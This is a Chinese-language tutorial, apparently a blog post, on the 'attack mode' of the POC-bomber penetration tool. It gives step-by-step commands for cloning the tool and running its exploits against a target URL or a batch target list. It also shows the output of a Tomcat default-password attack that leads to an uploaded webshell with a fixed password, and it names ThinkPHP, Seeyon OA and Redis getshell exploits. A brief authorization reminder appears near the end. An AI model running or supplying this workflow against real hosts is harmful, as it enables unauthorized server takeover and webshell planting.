POC-bomber攻击模式详解:一键getshell的完整操作流程

【免费下载链接】POC-bomber 利用大量高威胁poc/exp快速获取目标权限,用于渗透和红队快速打点 【免费下载链接】POC-bomber 项目地址: https://gitcode.com/gh_mirrors/po/POC-bomber

POC-bomber是一款功能强大的渗透测试工具,它利用大量高威胁POC/EXP快速获取目标权限,帮助渗透测试人员和红队快速打点。本文将详细介绍POC-bomber的攻击模式,以及如何通过简单操作实现一键getshell的完整流程。

一、POC-bomber攻击模式概述 🚀

POC-bomber提供了多种攻击模式,其中最常用的是exp攻击模式。通过这种模式,用户可以直接利用工具中内置的漏洞利用脚本(EXP)对目标系统进行攻击,从而快速获取系统权限。

在inc/output.py文件中,我们可以看到exp攻击模式的使用方法:

exp攻击模式:       python3 pocbomber.py -u 目标url --poc="指定poc文件" --attack

这种模式的优势在于操作简单,用户只需指定目标URL和对应的POC文件,即可一键执行攻击,大大提高了渗透测试的效率。

二、一键getshell的完整操作流程 🔍

2.1 环境准备

首先,需要克隆POC-bomber仓库到本地:

git clone https://gitcode.com/gh_mirrors/po/POC-bomber

进入项目目录,并安装所需依赖:

cd POC-bomber
pip install -r requirements.txt

2.2 查看可用的POC/EXP

POC-bomber提供了丰富的POC和EXP脚本,用户可以通过以下命令查看所有可用的脚本:

python3 pocbomber.py --show

这条命令会列出所有POC/EXP的名称、路径以及是否支持攻击模式。例如,我们可以找到多个支持getshell的脚本:

  • Tomcat 弱口令(上传war包getshell)
  • 致远 OA A8 htmlofficeservlet getshell 漏洞
  • thinkphp2_rce.py
  • thinkphp5022_5129.py
  • thinkphp5023_rce.py

2.3 执行攻击获取shell

以Tomcat弱口令漏洞为例,我们来演示如何一键getshell。对应的POC文件为pocs/middleware/tomcat/tomcat_weakpass_getshell.py。

执行以下命令启动攻击模式:

python3 pocbomber.py -u http://目标IP:8080 --poc="tomcat_weakpass_getshell.py" --attack

工具会首先尝试使用默认的用户名和密码列表登录Tomcat管理后台。如果登录成功,会显示以下信息:

[+] tomcat登录成功!
[+] 获取到: JSESSIONID=xxx
[+] tomcat后台getshell步骤
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
|    1.在后台将文件 /pocs/middleware/tomcat/tomcat.war 上传            |
|    2.上传成功后在 根目录下的 /tomcat/test.jsp 可以访问到webshell!       |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
[+] 注意: 在将war包上传后访问
[*] webshell地址(蚁剑): http://目标IP:8080/tomcat/test.jsp
[*] 密码: pocbomber

按照提示,在Tomcat管理后台上传tomcat.war文件,然后通过提供的URL和密码即可连接webshell。

2.4 其他getshell方法

除了Tomcat弱口令漏洞,POC-bomber还提供了多种getshell方法,例如:

  1. 致远OA漏洞:pocs/web/seeyon/seeyon_oa_a8_htmlofficeservlet_getshell.py
  2. ThinkPHP漏洞:pocs/framework/thinkphp/thinkphp2_rce.py、thinkphp5022_5129.py等
  3. Redis未授权访问:pocs/ports/redis_6379.py(利用redis-rogue-getshell)

使用方法类似,只需替换对应的--poc参数即可。

三、攻击模式参数详解 ⚙️

POC-bomber的攻击模式提供了多个参数,以满足不同场景的需求:

  • -u/--url:指定单个目标URL
  • -f/--file:指定包含多个目标URL的文件
  • -p/--poc:指定要使用的POC文件,多个文件用逗号分隔
  • -t/--thread:指定线程池最大并发数量(默认10)
  • -to/--timeout:指定POC最大超时时间(默认10秒)
  • -d/--delay:指定POC休眠时间(默认0秒)
  • --attack:启用攻击模式
  • --dnslog:使用dnslog平台检测无回显漏洞

例如,要批量检测多个目标并使用多个POC,可以使用以下命令:

python3 pocbomber.py -f targets.txt --poc="tomcat_weakpass_getshell.py,thinkphp2_rce.py" --attack -t 20

四、注意事项与最佳实践 📝

  1. 法律合规:在进行任何渗透测试之前,确保已获得合法授权,遵守相关法律法规。

  2. 目标范围:明确测试范围,避免对未授权目标进行测试。

  3. 结果记录:使用-o参数指定输出文件,记录测试结果,便于后续分析。

  4. 定期更新:POC-bomber的POC/EXP库会不断更新,定期拉取最新代码以获取最新漏洞利用脚本。

  5. 自定义POC:如果内置POC不能满足需求,可以根据项目规范编写自定义POC,放置在pocs目录下即可被工具识别。

通过本文的介绍,相信您已经掌握了POC-bomber攻击模式的使用方法和一键getshell的完整流程。POC-bomber作为一款强大的渗透测试工具,能够帮助安全人员快速发现并利用目标系统的漏洞,提高渗透测试效率。但请始终记住,技术的力量应该用于正当的安全测试和防护,而非恶意攻击。

【免费下载链接】POC-bomber 利用大量高威胁poc/exp快速获取目标权限,用于渗透和红队快速打点 【免费下载链接】POC-bomber 项目地址: https://gitcode.com/gh_mirrors/po/POC-bomber

Logo

腾讯云面向开发者汇聚海量精品云计算使用和开发经验,营造开放的云计算技术生态圈。

更多推荐